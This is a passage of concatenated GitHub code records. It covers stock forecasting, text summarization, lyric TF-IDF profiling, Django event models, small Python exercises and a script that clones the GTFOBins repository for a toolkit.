== '5d':\n # About 45 hours in a 5-day trading period\n self.steps = 45\n self.granularity = '1h'\n if forcast_time_span == '1mo':\n # 30 days in a month\n self.steps = 30\n self.granularity = '1d'\n if forcast_time_span == '6mo':\n # 6 months has 26 weeks x 5 trading days\n self.steps = 130\n self.granularity = '1d'\n self.delta_days = 4000\n if forcast_time_span == '1y':\n # 1 year has 52 weeks x 5 trading days\n self.steps = 260\n self.granularity = '1d'\n self.delta_days = 4000\n\n self.training_segment = 4 * self.steps\n\n\n def forcast_test(self): \n plt.cla() \n model = self.__train()\n prediction = self.__predict(model)\n return prediction\n\n def __train(self):\n if self.algorithm == 'randomforest':\n model = self.__random_forest()\n if self.algorithm == 'lstm':\n model = self.__lstm()\n return model\n\n def __random_forest(self):\n delta = datetime.timedelta(days=self.delta_days)\n start_date = date.today() - delta\n end_date = date.today()\n if self.forcast_time_span in ['1d', '5d']:\n data = yf.download(self.symbol, start=start_date.strftime('%Y-%m-%d'), end=end_date.strftime('%Y-%m-%d'),\n interval=self.granularity)\n if self.forcast_time_span in ['1mo', '6mo']:\n data = yf.download(self.symbol, start=start_date.strftime('%Y-%m-%d'), end=end_date.strftime('%Y-%m-%d'),\n interval=self.granularity)\n if self.forcast_time_span in ['1y']:\n data = yf.download(self.symbol, start=start_date.strftime('%Y-%m-%d'), end=end_date.strftime('%Y-%m-%d'),\n interval=self.granularity)\n self.data = data\n price_data = self.data.iloc[:]['Open'].values\n\n # Limit amount of data points. Too much data causes increased training time.\n if len(price_data) >= self.data_points:\n price_data = self.data.iloc[:]['Open'].values[-self.data_points:]\n else:\n price_data = self.data.iloc[:]['Open'].values[:]\n\n # Method to create training\n def create_dataset(dataframe):\n x = []\n y = []\n for i in range(self.training_segment, len(dataframe)):\n x.append(dataframe[i - self.training_segment:i])\n y.append(dataframe[i])\n x = np.array(x)\n y = np.array(y)\n return x, y\n\n self.x_train, self.y_train = create_dataset(price_data[0:-(self.training_segment + self.steps)])\n self.x_test = np.array(price_data[-(self.training_segment + self.steps): -self.steps]).reshape(1, -1)\n self.y_test = np.array(price_data[-self.steps:])\n # self.x_train, self.y_train = make_regression(n_features=4, n_informative=2, random_state=0, shuffle=False)\n model = RandomForestRegressor(max_depth=20, random_state=123, n_estimators=500, max_features='sqrt')\n model.fit(self.x_train, self.y_train)\n prediction = self.__predict(model)\n mse = mean_squared_error(self.y_test, prediction[0])\n print(mse)\n\n\n self.data['Open'][-(self.training_segment + self.steps):-self.steps].plot(label='Training data')\n self.data['Open'][-self.steps:].plot(label='Testing data')\n plt.plot(self.data.index[-self.steps:], prediction[0], label='Prediction data')\n plt.legend(loc='upper center')\n \n\n buffer = BytesIO()\n plt.savefig(buffer, format='png')\n buffer.seek(0)\n image_png = buffer.getvalue()\n buffer.close()\n\n graphic = base64.b64encode(image_png)\n graphic = graphic.decode('utf-8')\n\n self.plot = graphic\n\n return model\n\n def __lstm(self):\n model = None\n return model\n\n def __predict(self, model):\n prediction = self.x_test\n\n for i in range(self.steps):\n prediction = np.append(prediction, model.predict(prediction))\n prediction = prediction[-self.training_segment:].reshape(1, -1)\n return prediction[:, 
-self.steps:]\n","repo_name":"paochouayang/MachineLearningStockPredictionProject","sub_path":"mlstocks/stocks_site/stockPredict.py","file_name":"stockPredict.py","file_ext":"py","file_size_in_byte":5954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73163548030","text":"import os\nimport numpy as np\nimport tensorflow as tf\n\nsymbols = dict()\nsymbols['EOS_CHAR'], symbols['EOS_INDEX'] = '', 0\nsymbols['UNK_CHAR'], symbols['UNK_INDEX'] = '', 1\nsymbols['SOS_CHAR'], symbols['SOS_INDEX'] = '', 2\n\n\ndef force_mkdir(dir_path):\n    '''\n    This function is used to create a directory if it doesn't exist\n    '''\n    try:\n        os.mkdir(dir_path)\n    except:\n        pass\n\n\ndef loadGlove(embedding_file, params):\n    '''\n    This function is used to load the embedding\n    :param embedding_file: The path to embedding_file\n    :param params: The parameters for its extraction\n    '''\n    EOS_CHAR, SOS_CHAR, UNK_CHAR = symbols['EOS_CHAR'], symbols['SOS_CHAR'], symbols['UNK_CHAR']\n    vocab = [EOS_CHAR, UNK_CHAR, SOS_CHAR]\n    embedding = [np.zeros((params.embed_dim,)), np.random.normal(size=(params.embed_dim,)), np.ones((params.embed_dim,))]\n    if embedding_file.endswith('txt'):\n        file = open(embedding_file, 'r+')\n        for index, line in enumerate(file.readlines()):\n            row = line.strip().split(' ')\n            vocab.append(row[0])\n            embedding.append([float(x) for x in row[1:]])\n        print('Glove word vectors are Loaded!')\n        file.close()\n    return vocab, np.asarray(embedding)\n\n\ndef get_bleu(sess, batch_size, bleu_score):\n    '''\n    This function returns the bleu score\n    '''\n    bleu_score_temp = []\n    while True:\n        try:\n            bleu_score_temp.append(sess.run(bleu_score, feed_dict={batch_size: 1}))\n        except tf.errors.OutOfRangeError:\n            break\n    return sum(bleu_score_temp) / len(bleu_score_temp)\n\n\ndef rev_vocab(vocab):\n    '''\n    This function returns the reverse vocab dictionary\n    '''\n    rev_vocab = dict()\n    for index, val in enumerate(vocab):\n        rev_vocab[index] = val\n    return rev_vocab\n\ndef generate_output(output, output_file, embedding_file, params):\n    '''\n    This function converts the output from index to text based on embedding_file and saves it in output_file\n    '''\n    vocab, embedding = loadGlove(embedding_file, params)\n    reverse_vocab = rev_vocab(vocab)\n    output_file = open(output_file, 'w+')\n    for line in output:\n        temp_summary = np.vectorize(reverse_vocab.get)(line)\n        a = ' '.join(temp_summary[:-1]) + '\\n'\n        output_file.write(a)\n    output_file.close()\n","repo_name":"akashr050/abstractive_summarizer","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"20012509335","text":"toppings = ['pepperoni','pineapple','cheese','sausage','olives','anchovies','mushrooms']\nprices = [2, 6, 1, 3, 2, 7, 2]\n\nnum_pizzas = len(toppings)\nprint('We sell '+str(num_pizzas)+ ' different kinds of pizza!')\n\npizzas = list(zip(prices, toppings))\nprint('pizzas '+ str(pizzas))\n\npizzas.sort()\nprint('pizzas sort()' + str(pizzas))\n\ncheapest_pizza = pizzas[0]\npriciest_pizza = pizzas[-1]\n\n#Slice the pizzas list and store the 3 lowest cost pizzas in a list called three_cheapest.\nthree_cheapest = pizzas[0:3]\nprint('three_cheapest' + str(three_cheapest))\n\n#Your boss wants you to do some research on $2 slices. 
\nnum_two_dollar_slices = prices.count(2)\nprint('num_two_dollar_slices '+ str(num_two_dollar_slices))\n","repo_name":"ssaulrj/codes-python","sub_path":"codeacademy-python3/lists/list_exercise_pizza.py","file_name":"list_exercise_pizza.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"38240608385","text":"import csv, os, sys, re, nltk, math, operator\nfrom pprint import pprint\nfrom nltk.corpus import stopwords\n \n\n#artist,song,link,text\nclass artistprofiling(object):\n songsPerArtist = {}\n all_words = {}\n\n # Initializes the class, opens the file and puts the values of rows into a global list called 'songs' \n # in which they are stored in a dictionary format.\n def __init__(self):\n data = csv.reader(iter(sys.stdin.readline, ''))\n next(data)\n for songRow in data:\n artist = songRow[0]\n lyrics = songRow[3]\n if artist not in self.songsPerArtist:\n self.songsPerArtist[artist] = lyrics\n else: # We concatenate the lyrics of all the songs per artists into document.\n self.songsPerArtist[artist] += lyrics\n\n\n # the document has now become an artist with all the lyrics compiled together and so we calculat the document frequency and store it in a map.\n def calculcateDocumentFrequency(self):\n all_words = {}\n #get that row of lyrics\n for artist in self.songsPerArtist:\n lyrics = self.songsPerArtist[artist]\n words = self.preProcessLyrics(lyrics)\n #we only need the word to appear once so we check that specific word how many times\n #it appears in all the other documents\n words = set(words)\n for word in words:\n if word not in all_words:\n all_words[word] = 1\n else:\n all_words[word] += 1\n return all_words\n\n # Calculates the amount of times a term appears in all the songs of an artist. 
The lyrics that we pass are a concantenation of all the artists song lyrics.\n def calculateTermFrequency(self, lyrics):\n word_frequency = {}\n words = self.preProcessLyrics(lyrics)\n for word in words:\n if word not in word_frequency.keys():\n word_frequency[word] = 1\n else:\n word_frequency[word] += 1\n return word_frequency\n\n # Uses the values from the document frequency and term frequency \n def calculcatetfIdf(self, song):\n words_idf = self.calculcateDocumentFrequency()\n N = len(self.songsPerArtist)\n all_words = {}\n \n words_tf = self.calculateTermFrequency(song)\n #get all the words frequency for that song\n for word in words_tf:\n #get that word and get the idf for that word\n idf = words_idf[word]\n idf = math.log10(N/idf)\n tf = 1+ math.log10(words_tf[word])\n tf_idf = tf * idf\n all_words[word] = tf_idf\n\n \n top_words = dict(sorted(all_words.items(), key=operator.itemgetter(1), reverse=True)[:100])\n return top_words\n\n # This method removes the stopwords, removes punctuation and sets the words to lower case.\n def preProcessLyrics(self, lyrics):\n stop_words = set(stopwords.words('english')) \n #get an array of all the words\n words = re.findall(r'\\w+', lyrics)\n filtered_lyrics = []\n for word in words:\n if word not in stop_words:\n filtered_lyrics.append(word)\n return filtered_lyrics\n\n # Pretty printing ;)\n def getProfilesForAllArtists(self):\n for artist in self.songsPerArtist:\n print(artist)\n words_and_tf_idf = self.calculcatetfIdf(self.songsPerArtist[artist])\n for word in words_and_tf_idf:\n print(word + \": \" + str(words_and_tf_idf[word]))\n \n\n#Instatiate and run\nap = artistprofiling()\nap.getProfilesForAllArtists()\n\n","repo_name":"rachy95/bigData","sub_path":"artistprofiling.py","file_name":"artistprofiling.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21989331320","text":"'''\nCreated on Oct 24, 2017\n\n@author: Tudor\n'''\n\nfrom total_expenses import calculate_expenses, calculate_expenses_by_type\n\ndef get_type(my_type, V):\n #This method searches the type of an expense in the list V\n #input: my_type = the type of expense that is searched\n # V = the list of expenses\n #output: the position 'i' in the list of the searched expense type, or -1 is it doesn't exist\n \n for i in range(0, len(V)):\n if V[i][0] == my_type:\n return i\n return -1\n\ndef quicksort(left, right, V):\n #This is the well known quicksort algorithm, which sorts a list V in a Divide and Conquer method\n #input: left = the lower bound of the interval that we sort\n # right = the upper bound of the interval that we sort\n #output: V = the sorted list\n \n i = left\n j = right\n mid = (i + j) >> 1\n pivot = V[mid][1]\n while i <= j:\n while V[i][1] < pivot:\n i = i + 1\n while V[j][1] > pivot:\n j = j - 1\n if i <= j:\n tmp = V[i]\n V[i] = V[j]\n V[j] = tmp\n i = i + 1\n j = j - 1\n if left < j:\n quicksort(left, j, V)\n if i < right:\n quicksort(i, right, V)\n \ndef sort_by_apartment(apartments):\n #This method writes the list of apartments sorted ascending by total amount of expenses.\n #input: apartment = the list of apartments\n #output V = the sorted list of apartments\n V = []\n calculated = [False] * 10005\n for apartment in apartments:\n if calculated[apartment[\"apartment_id\"]]:\n continue\n calculated[apartment[\"apartment_id\"]] = True\n val = calculate_expenses(apartment[\"apartment_id\"], apartments)\n V.append((apartment[\"apartment_id\"], val))\n \n 
quicksort(0, len(V) - 1, V)\n print(\"The apartments sorted ascending by total amount of expenses: \")\n for i in V:\n print(i[0], \"with\", i[1], \"RON\")\n return V\n\n \ndef sort_by_type(apartments):\n #This method writes the total amount of expenses for each type, sorted ascending by amount of money.\n #input: apartment = the list of apartments\n #output V = the sorted list of apartments\n V = []\n for apartment in apartments:\n pos = get_type(apartment[\"type\"], V)\n val = calculate_expenses_by_type(apartment[\"type\"], apartments)\n if pos == -1: #if the current expense type doesn't exist in the list V\n V.append((apartment[\"type\"], val))\n quicksort(0, len(V) - 1, V)\n print(\"The total amount of expenses for each type, sorted ascending by amount of money:\")\n for i in V:\n print(i[0], \"with\", i[1], \"RON\") \n return V \n \n ","repo_name":"TudorMaxim/assignment3-4Python","sub_path":"sort_utility.py","file_name":"sort_utility.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"7746746936","text":"# -*- coding: utf8 -*-\nfrom phystricks import *\ndef figureSIZwqIZ():\n pspict,fig = SinglePicture(\"figureSIZwqIZ\")\n pspict.dilatation_X(0.8)\n pspict.dilatation_Y(0.5)\n\n x=var('x')\n\n F=[]\n F.append(phyFunction(x**2).graph(-2.5,2.5))\n F.append(phyFunction( 1-x**2 ).graph(-2,2))\n F.append(phyFunction( x+1 ).graph(-4,3))\n F.append(phyFunction( (x+2)**2 ).graph(-4,0.5))\n\n F[0].put_mark(0.2,0,\"\\( C_1\\)\",pspict=pspict,position=\"corner\")\n F[1].put_mark(0.2,0,\"\\( C_2\\)\",pspict=pspict,position=\"corner\")\n F[2].put_mark(0.2,0,\"\\( C_3\\)\",pspict=pspict,position=\"corner\")\n F[3].put_mark(0.2,0,\"\\( C_4\\)\",pspict=pspict,position=\"corner\")\n\n pspict.DrawGraphs(F)\n\n pspict.axes.no_graduation()\n pspict.axes.single_axeX.put_mark(0.2,-45,\"\\( x\\)\",pspict=pspict,position=\"corner\")\n pspict.axes.single_axeY.put_mark(0.2,45,\"\\( y\\)\",pspict=pspict,position=\"corner\")\n #pspict.DrawDefaultGrid()\n pspict.DrawDefaultAxes()\n\n fig.no_figure()\n fig.conclude()\n fig.write_the_file()\n","repo_name":"LaurentClaessens/smath","sub_path":"phystricksfigureSIZwqIZ.py","file_name":"phystricksfigureSIZwqIZ.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"11671776973","text":"from datetime import datetime\nfrom datetime import date\nfrom .models import *\nfrom django.contrib import messages\nfrom django.shortcuts import redirect\n\n\ndef try_parsing_date(text):\n for fmt in ('%d-%m-%Y', '%d.%m.%Y', '%d/%m/%Y'):\n try:\n return datetime.strptime(text, fmt)\n except ValueError:\n ## format is not valid\n pass\n # raise ValueError('no valid date format found')\n return None\n\n# use after get data and want to save it\ndef BD_str_to_AD_str(date_str): # change BD to AD as date(พ.ศ. -> ค.ศ.) d/m/Y(str) -> date\n # change BC year str to AC str\n d, m, y = date_str.split(\"/\",2)\n AD_y = str(int(y) - 543 )\n AD_str = d+'/'+m+'/'+AD_y\n return AD_str\n\n# use when you send data to show at front-end\ndef AD_date_to_BD_str(dateObj): # change AD to BD as string(ค.ศ. -> พ.ศ.) 
date -> d/m/Y (str)\n # import pdb; pdb.set_trace()\n if isinstance(dateObj, date):\n AD_str = dateObj.strftime('%d/%m/%Y') # date to str\n else:\n AD_str = dateObj\n # change AC year str to BC str\n d, m, y = AD_str.split(\"/\",2)\n BD_y = str(int(y) + 543 )\n BD_str = d+'/'+m+'/'+BD_y \n \n return BD_str\n\n\ndef packDataToDict(request,modelInput,modelFormInput,path,user_id_input,dict_send):\n input_pack = {}\n input_pack['request'] = request\n input_pack['modelInput'] = modelInput\n input_pack['modelFormInput'] = modelFormInput\n input_pack['path'] = path\n input_pack['user_id_input'] = user_id_input\n input_pack['dict_send'] = dict_send\n return input_pack\n\ndef fixDateinPostForm(path, form, toAC=False):\n \n if toAC:\n ### because we cannot use '' != '' to check empty string. \n ### So, just check that variable in if\n # is_null = ''\n trans_func = BD_str_to_AD_str\n else:\n # is_null = None\n trans_func = AD_date_to_BD_str\n\n #### preprocess some data\n if path == \"personal_info\":\n date_value = form.data['birth_date'] \n if date_value: # if it's None or '', it will get False \n form.data['birth_date'] = trans_func(date_value)\n \n if path == \"work_info\":\n start_service_date = form.data['start_service_date'] \n if start_service_date:\n form.data['start_service_date'] = trans_func(start_service_date)\n # import pdb; pdb.set_trace()\n end_service_date = form.data['end_service_date'] \n if end_service_date:\n form.data['end_service_date'] = trans_func(end_service_date)\n \n start_PW_date = form.data['start_PW_date'] \n if start_PW_date:\n form.data['start_PW_date'] = trans_func(start_PW_date) \n\n if path == \"insignia\":\n date_value = form.data['date1'] \n if date_value: \n form.data['date1'] = trans_func(date_value)\n\n return form\n\n\ndef fixDateinRegularForm(path, form):\n is_null = None\n trans_func = AD_date_to_BD_str\n if path == \"personal_info\":\n date_value = form['birth_date'].value() \n if date_value != is_null : \n form['birth_date'].initial = trans_func(date_value)\n\n if path == \"work_info\":\n start_service_date = form['start_service_date'].value() \n if start_service_date != is_null :\n form['start_service_date'].initial = trans_func(start_service_date)\n \n end_service_date = form['end_service_date'].value() \n if end_service_date != is_null :\n form['end_service_date'].initial = trans_func(end_service_date)\n \n start_PW_date = form['start_PW_date'].value() \n if start_PW_date != is_null :\n form['start_PW_date'].initial = trans_func(start_PW_date) \n \n if path == \"insignia\":\n date_value = form['date1'].value() \n if date_value != is_null :\n form['date1'].initial = trans_func(date_value)\n\n\n return form\n\ndef tryToSave(ip_p, userInput, form):\n\n form = fixDateinPostForm(ip_p['path'], form,toAC=True)\n \n if form.is_valid():\n recipe = form.save(commit=False)\n recipe.user = userInput \n \n\n if ip_p['path'] == \"personal_info\": \n recipe.card_number = userInput.username\n birthDate = try_parsing_date(form.data['birth_date'])\n # birthDate = form.data['birth_date']\n if birthDate:\n workInfoObj = WorkInfo.objects.get(user=userInput.id)\n if birthDate.month < 10:\n new_date = date(birthDate.year + 60 ,9,30)\n else:\n new_date = date(birthDate.year + 61 ,9,30)\n workInfoObj.end_service_date = new_date\n workInfoObj.save()\n\n recipe.save()\n\n ## show message in base.html\n messages.success(ip_p['request'], 'ดำเนินการสำเร็จ!!') \n if ip_p['request'].user.is_staff: \n redirect_dest = redirect('data:list_teacher')\n else:\n redirect_dest = 
redirect('home') \n is_save = True \n else:\n messages.error(ip_p['request'], 'โปรดแก้ข้อผิดพลาดด้านล่างก่อน')\n form = fixDateinPostForm(ip_p['path'], form,toAC=False)\n\n is_save = False\n redirect_dest = None\n return is_save, redirect_dest\n\n\n\ndef prepareToFront(ip_p, form, dict_send, modelObj=None):\n\n # set form data and send to front-end\n # import pdb; pdb.set_trace()\n # form = fixDateinForm(ip_p, form,toAC=False)\n dict_send['form'] = form\n\n ## change datetime when open the page for edit Y-m-d --> d/m/Y (just for good looking) \n if ip_p['path'] == \"personal_info\" : \n dict_send['path_picture'] = \"/media/\" + str(modelObj.image) \n \n \n # date_value = form['birth_date'].value() \n # if date_value != None :\n # form['birth_date'].initial = AD_date_to_BD_str(date_value)\n \n # elif path == \"work_info\" :\n # start_service_date = form['start_service_date'].value() \n # if start_service_date != None :\n # form['start_service_date'].initial = AD_date_to_BD_str(start_service_date)\n \n # end_service_date = form['end_service_date'].value() \n # if end_service_date != None :\n # form['end_service_date'].initial = AD_date_to_BD_str(end_service_date)\n \n # start_PW_date = form['start_PW_date'].value() \n # if start_PW_date != None :\n # form['start_PW_date'].initial = AD_date_to_BD_str(start_PW_date)\n \n ### for given name\n dict_send['form_tuple'] = [] \n for i,field in enumerate(form):\n if len(dict_send['name_list']) > 0 :\n dict_send['form_tuple'].append( (dict_send['name_list'][i] , field) )\n\n return dict_send\n","repo_name":"peachman05/Pwcrew","sub_path":"data/viewHelper.py","file_name":"viewHelper.py","file_ext":"py","file_size_in_byte":7019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30595695704","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDescription: Script allow you to rename data in input folder:\n\nAuthors: Evgenii Churiulin\n\nCurrent Code Owner: MPI-BGC, Evgenii Churiulin\nphone: +49 170 261-5104\nemail: evgenychur@bgc-jena.mpg.de\n\nHistory:\nVersion Date Name\n---------- ---------- ----\n 1.1 06.03.2023 Evgenii Churiulin, MPI-BGC\n Initial release\n 1.2 07.06.2023 Evgenii Churiulin, MPI-BGC\n Code refactoring\n\"\"\"\n# ============================= Import modules =================\n# -- Standard:\nimport os\nimport pandas as pd\n# ============================= Personal functions ===================\n\n# ================ User settings (have to be adapted) =================\nmain = 'C:/Users/evchur/Desktop/Ergebnisse/MH-r/Test/'\n# -- Input and Output paths:\npin = main\npout = main\n# -- New common name for input data:\nname = 'highTOC_Gerighausen_'\n# -- Data format:\nexc_format = '.xls'\n# ============================= Main program =========================\nif __name__ == '__main__':\n # -- Get the list of input data in main folder (we are interesting only in '.xls' files )\n lst4names = []\n for path in os.listdir(main):\n if path.endswith(exc_format):\n lst4names.append(path)\n # -- Get absolute data paths:\n lst4paths = []\n for file in lst4names:\n lst4paths.append(os.path.join(main, file))\n # -- Get the list out new files based on input data:\n lst4out = []\n for file in lst4paths:\n df = pd.read_excel(file)\n num = df['Unnamed: 1'][0]\n new_name = f'{name}EL{num}{exc_format}'\n lst4out.append(os.path.join(main, new_name))\n # -- Rename and save files:\n for i in range(len(lst4out)):\n print(f'File \\n {lst4paths[i]} was rename to \\n {lst4out[i]}')\n print(' ')\n 
os.rename(lst4paths[i], lst4out[i])\n# ============================= End of program ======================\n","repo_name":"EvgenyChur/TIC_TOC_postprocessing","sub_path":"scripts/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37500769780","text":"from django.db import models\nfrom django.conf import settings\nfrom django.db.models import Value, Func, F\nimport math\n\nfrom django.db.backends.signals import connection_created\nfrom django.dispatch import receiver\n\n\n@receiver(connection_created)\ndef extend_sqlite(connection=None, **kwargs):\n if connection.vendor == \"sqlite\":\n # sqlite doesn't natively support math functions, so add them\n cf = connection.connection.create_function\n cf('SQRT', 1, math.sqrt)\n cf('ATAN2', 2, math.atan2)\n cf('POW', 2, math.pow)\n cf('ACOS', 1, math.acos)\n cf('COS', 1, math.cos)\n cf('RADIANS', 1, math.radians)\n cf('SIN', 1, math.sin)\n\n\nclass BaseModel(models.Model):\n created_time = models.DateTimeField(auto_now_add=True)\n timestamp = models.DateTimeField(auto_now=True)\n\n class Meta:\n abstract = True\n\n\nclass Event(BaseModel):\n title = models.CharField(max_length=100, blank=False)\n description = models.TextField(blank=True)\n start_date = models.DateField()\n start_time = models.TimeField()\n end_date = models.DateField(blank=True, null=True)\n end_time = models.TimeField(blank=True, null=True)\n organizer = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n related_name=\"events_organized\",\n on_delete=models.CASCADE)\n location = models.ForeignKey(\n 'events.Location',\n related_name='events',\n on_delete=models.CASCADE)\n min_participants = models.PositiveIntegerField()\n max_participants = models.PositiveIntegerField()\n event_type = models.CharField(max_length=100)\n\n\nclass Participant(BaseModel):\n class Meta:\n unique_together = ((\"user\", \"event\"),)\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n related_name=\"events_participated\",\n on_delete=models.CASCADE)\n event = models.ForeignKey(\n 'events.Event',\n related_name='participants',\n on_delete=models.CASCADE)\n status = models.CharField(\n max_length=30,\n choices=(\n (\"INTERESTED\", \"Interested\"),\n (\"GOING\", \"Going\"),\n (\"NOTGOING\", \"Not going\"),\n (\"INVITED\", \"Invited\")),\n default=\"INTERESTED\")\n\n\nclass Friendship(BaseModel):\n status = models.CharField(\n max_length=20,\n choices=(\n (\"PENDING\", \"Pending\"),\n (\"FRIENDS\", \"Friends\"),\n (\"BLOCKED\", \"Blocked\"),\n ), default=\"FRIENDS\"\n )\n requested_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, blank=True)\n profiles = models.ManyToManyField('Profile', blank=True)\n\n\nclass Profile(BaseModel):\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)\n location = models.ForeignKey(\n 'events.Location',\n related_name='profiles',\n on_delete=models.CASCADE)\n first_name = models.CharField(max_length=50, blank=False)\n last_name = models.CharField(max_length=50, blank=False)\n description = models.TextField(blank=True)\n email = models.CharField(max_length=100, blank=True)\n birth_date = models.DateField(blank=True, null=True)\n gender = models.CharField(\n max_length=20,\n choices=(\n (\"MALE\", \"Male\"),\n (\"FEMALE\", \"Female\"),\n (\"OTHER\", \"Other\"),\n (\"NOANSWER\", \"\")\n ),\n default=\"NOANSWER\")\n friends = models.ManyToManyField('Friendship', 
through=Friendship.profiles.through, blank=True)\n    profile_picture = models.TextField(blank=True)\n\n\n    @property\n    def full_name(self):\n        return \"{} {}\".format(self.first_name, self.last_name)\n\n\nclass LocationManager(models.Manager):\n    def nearby(self, latitude, longitude, proximity):\n        \"\"\"\n        Return all objects whose distance to the specified coordinates\n        is less than the proximity given in kilometers\n        \"\"\"\n        # Great circle distance formula\n\n        earth_radius=Value(6371.0, output_field=models.FloatField())\n\n        f1=Func(F('latitude'), function='RADIANS', output_field=models.FloatField())\n        latitude2=Value(latitude, output_field=models.FloatField())\n        f2=Func(latitude2, function='RADIANS', output_field=models.FloatField())\n\n        l1=Func(F('longitude'), function='RADIANS', output_field=models.FloatField())\n        longitude2=Value(longitude, output_field=models.FloatField())\n        l2=Func(longitude2, function='RADIANS', output_field=models.FloatField())\n\n        d_lat=Func(F('latitude'), function='RADIANS', output_field=models.FloatField()) - f2\n        d_lng=Func(F('longitude'), function='RADIANS', output_field=models.FloatField()) - l2\n\n        sin_lat = Func(d_lat/2, function='SIN', output_field=models.FloatField())\n        cos_lat1 = Func(f1, function='COS', output_field=models.FloatField())\n        cos_lat2 = Func(f2, function='COS', output_field=models.FloatField())\n        sin_lng = Func(d_lng/2, function='SIN', output_field=models.FloatField())\n\n        a = Func(sin_lat, 2, function='POW', output_field=models.FloatField()) + cos_lat1 * cos_lat2 * Func(sin_lng, 2, function='POW', output_field=models.FloatField())\n        c = 2 * Func(Func(a, function='SQRT', output_field=models.FloatField()), Func(1 - a, function='SQRT', output_field=models.FloatField()), function='ATAN2', output_field=models.FloatField())\n        d = earth_radius * c\n\n        res = self.get_queryset()\\\n            .exclude(latitude=None)\\\n            .exclude(longitude=None)\\\n            .annotate(d=d)\\\n            .filter(d__lte=proximity)\\\n            .order_by('d')\n        return res\n\n\n\nclass Location(BaseModel):\n    objects = LocationManager()\n\n    city = models.CharField(max_length=100, blank=False)\n    country = models.CharField(max_length=100, blank=False)\n    street = models.CharField(max_length=100, blank=True)\n    google_id = models.CharField(max_length=50, blank=True)\n    google_formatted_address = models.CharField(max_length=1000, blank=True)\n    longitude = models.DecimalField(max_digits=9, decimal_places=6)\n    latitude = models.DecimalField(max_digits=9, decimal_places=6)\n\n\nclass Tag(BaseModel):\n    text = models.CharField(max_length=20, blank=False)\n    events = models.ManyToManyField('events.Event', related_name='tags')\n\n\nclass Post(BaseModel):\n    title = models.CharField(max_length=50)\n    body = models.TextField(max_length=1000, blank=False)\n    event = models.ForeignKey('events.Event', related_name='posts', on_delete=models.CASCADE)\n    user = models.ForeignKey(settings.AUTH_USER_MODEL,\n                             on_delete=models.CASCADE)\n\n","repo_name":"j-tegen/gather-backend","sub_path":"project/events/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42122267783","text":"from functools import lru_cache\nimport csv\n\n\n@lru_cache\ndef read(path):\n\n    with open(path, mode=\"r\") as file:\n        path_reader = csv.DictReader(file)\n\n        list_content = list(path_reader)\n\n        return 
list_content\n","repo_name":"William-Kassab/Job-Insights","sub_path":"src/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"6033219555","text":"def Install():\n print(\"[GTFOBins] Downloading db ...\")\n import os\n os.chdir(\"/var/lib/mkt/Res/Data/\")\n os.system(\"git clone https://github.com/GTFOBins/GTFOBins.github.io.git GTFOBins\")\n\ndef Uninstall():\n print(\"[GTFOBins] Removing db...\")\n import os\n os.system(\"rm -rf /var/lib/mkt/Res/Data/GTFOBins\")\n\ndef Upgrade():\n print(\"[GTFOBins] Checking and upgrading ...\")\n import os\n os.chdir(\"/var/lib/mkt/Res/Data/GTFOBins/\")\n Branches = \"master\"\n os.system(\"git pull origin %s || (git stash drop && git pull origin %s )\" % (Branches,Branches))","repo_name":"manesec/maketoolkit","sub_path":"Res/Source/GTFOBin.py","file_name":"GTFOBin.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"7267663193","text":"from enum import Enum\n\ntest=\"\"\"A Y\nB X\nC Z\"\"\"\n\nROCK=1\nPAPER=2\nSCISSORS=3\n\ncodeShapes={'A':ROCK,'B':2,'C':3,'X':ROCK,'Y':PAPER,'Z':SCISSORS}\nscoreShape={ROCK:1,PAPER:2,SCISSORS:3}\n\n\n\n\n\n\ndef weWon(they,we):\n\n rules={(ROCK,PAPER):True,\n (ROCK,SCISSORS):False,\n (PAPER,ROCK):False,\n (PAPER,SCISSORS): True,\n (SCISSORS, PAPER):False,\n (SCISSORS, ROCK): True}\n return rules[(they,we)]\n\n \ndef scoreRound(they,we):\n score=we # \"The score for a single round is the score for the shape you selected (1 for Rock, 2 for Paper, and 3 for Scissors)\"\n\n if they==we:\n score+= 3 # \"3 if the round was a draw\"\n elif weWon(they, we):\n score += 6 # \"and 6 if you won\"\n # else \"0 if you lost\"\n return score\n\n \n\n \n\n\nscoreTotal=0\nf = test.splitlines()\nf = open(\"day2.txt\")\nfor i in f:\n they,we = i.split()\n they=codeShapes[they]\n we=codeShapes[we]\n scoreTotal+= scoreRound(they,we)\n\nprint(scoreTotal)\n\n\n\n# part two\nLOSE = 1\nDRAW = 2 \nWIN = 3\ncodeResult = {'X':LOSE,'Y':DRAW,'Z':WIN}\n\ndesiredWe={(ROCK,LOSE):SCISSORS,\n (ROCK,DRAW):ROCK,\n (ROCK,WIN):PAPER,\n (PAPER,LOSE):ROCK,\n 